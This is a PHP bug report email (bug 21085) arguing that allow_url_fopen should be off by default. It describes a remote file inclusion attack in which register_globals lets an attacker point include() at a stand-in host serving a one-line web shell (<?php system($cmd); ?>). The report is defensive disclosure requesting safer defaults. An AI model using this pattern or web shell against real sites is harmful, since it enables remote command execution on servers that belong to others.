From: [EMAIL PROTECTED] Operating system: ALL PHP version: 4.3.0RC3 PHP Bug Type: Unknown/Other Function Bug description: allow_url_fopen is on be default.
PHP by default allows include() calls which contain URL/URI strings. register_globals=on include($somevar/file.php); // real site code exploit by overriding $somevar to http://badsite.evilcode.com where file.php is <?php system($cmd); ?> This causes the "real site" to execute the $cmd command passed in on the URL/URI string. Requesting that allow_url_fopen be set to "Off" for future releases and a documentation note made about the caveat. -Mike -- Edit bug report at http://bugs.php.net/?id=21085&edit=1 -- Try a CVS snapshot: http://bugs.php.net/fix.php?id=21085&r=trysnapshot Fixed in CVS: http://bugs.php.net/fix.php?id=21085&r=fixedcvs Fixed in release: http://bugs.php.net/fix.php?id=21085&r=alreadyfixed Need backtrace: http://bugs.php.net/fix.php?id=21085&r=needtrace Try newer version: http://bugs.php.net/fix.php?id=21085&r=oldversion Not developer issue: http://bugs.php.net/fix.php?id=21085&r=support Expected behavior: http://bugs.php.net/fix.php?id=21085&r=notwrong Not enough info: http://bugs.php.net/fix.php?id=21085&r=notenoughinfo Submitted twice: http://bugs.php.net/fix.php?id=21085&r=submittedtwice register_globals: http://bugs.php.net/fix.php?id=21085&r=globals PHP 3 support discontinued: http://bugs.php.net/fix.php?id=21085&r=php3 Daylight Savings: http://bugs.php.net/fix.php?id=21085&r=dst IIS Stability: http://bugs.php.net/fix.php?id=21085&r=isapi